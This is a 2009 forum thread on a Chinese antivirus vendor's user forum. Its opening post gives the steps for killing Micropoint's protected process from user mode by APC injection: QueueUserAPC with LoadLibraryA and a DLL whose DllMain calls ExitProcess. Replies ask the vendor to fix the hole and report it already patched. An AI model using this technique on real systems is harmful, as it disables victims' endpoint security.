微点交流论坛 - 微点软件使用交流 - 利用APC代码注入Ring3强杀微点（严重） [转]

微点交流论坛 » 微点软件使用交流 » 利用APC代码注入Ring3强杀微点（严重） [转]

sogou
注册用户

积分 106
发帖 106
注册 2009-8-2

#1 利用APC代码注入Ring3强杀微点（严重） [转]

本文作者：xuyangwan 昵称:給噯①嗰希望日期：09-02-26 14:19:17

微点的自我保护做得是相当不错了，正因为此，挑战微点的自我保护才更有趣。不过本文没有任何想要贬低微点的意图，仅作技术研究而已。

之前本人还写过两篇，在本空间可以找到，第一篇意义不大，第二篇还行，可以在ring3杀掉微点。

玩玩微点之一：利用CreateEvent函数不让微点启动
玩玩微点之二：利用远程线程Ring3杀微点（严重）

今天写的这篇意义和上面第二篇差不多，都是在ring3杀死微点。废话不说了，我大概说说思路：

1.首先得到微点进程的pid和handle，我想这不是什么难事；

2.枚举微点进程的每个线程，得到线程的tid和handle，我想这也不是什么难事；

3.在微点的进程内存中找这样的字符串"nel32.dll"，一定可以找到，因为"kernel32.dll"这样的字符串是必然存在的；找到以后把这个字符串的地址记录下来。切忌该过程中，顶多读它的内存而已，动作不要太大。

4.QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)pStrAddress) 其中hThread是上面第2步得到的线程句柄，pStrAddress是上面第3步得到的"nel32.dll"字符串的地址。

这样的话，由于微点没有防QueueUserAPC，于是nel32.dll便成功的注入到微点的某个进程中。当然了这里要注意两点：

一是，nel32.dll要提前复制到系统目录下去，例如C:\windows或者C:\windows\system32；

二是，为了杀死微点的进程，nel32.dll可以如下写：

BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved)
{
if(ul_reason_for_call == DLL_PROCESS_ATTACH)
ExitProcess(0);
return TRUE;
}

具体详情请见：http://hi.baidu.com/cool4/blog/item/2e51f5089b70348bd1581ba6.html

[ Last edited by sogou on 2009-8-11 at 00:30 ]

※ ※ ※ 本文纯属【sogou】个人意见，与【微点交流论坛】立场无关※ ※ ※

2009-8-11 00:23

sogou
注册用户

积分 106
发帖 106
注册 2009-8-2

#2

希望微点针对这一个问题，及时提高软件预防能力！！

支持国产，支持微点！

大家努力帮微点进步！

[ Last edited by sogou on 2009-8-11 at 00:32 ]

※ ※ ※ 本文纯属【sogou】个人意见，与【微点交流论坛】立场无关※ ※ ※

2009-8-11 00:25

mamsds
银牌会员

积分 1373
发帖 1360
注册 2008-3-15
来自乌克兰

#3

太深奥了，完全不懂......

※ ※ ※ 本文纯属【mamsds】个人意见，与【微点交流论坛】立场无关※ ※ ※

Vi Veri Veniversum Vivus Vici.

2009-8-11 09:34

点饭的百度空间
银牌会员

积分 2315
发帖 2236
注册 2007-11-30

#4

2009-1-21 16:09 此问题微点已经解决。

※ ※ ※ 本文纯属【点饭的百度空间】个人意见，与【微点交流论坛】立场无关※ ※ ※

你的微笑 is 微点的骄傲！
http://hi.baidu.com/new/micropoint

2009-8-11 09:42

论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏

[ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司福建东方微点信息安全有限责任公司闽ICP备05030815号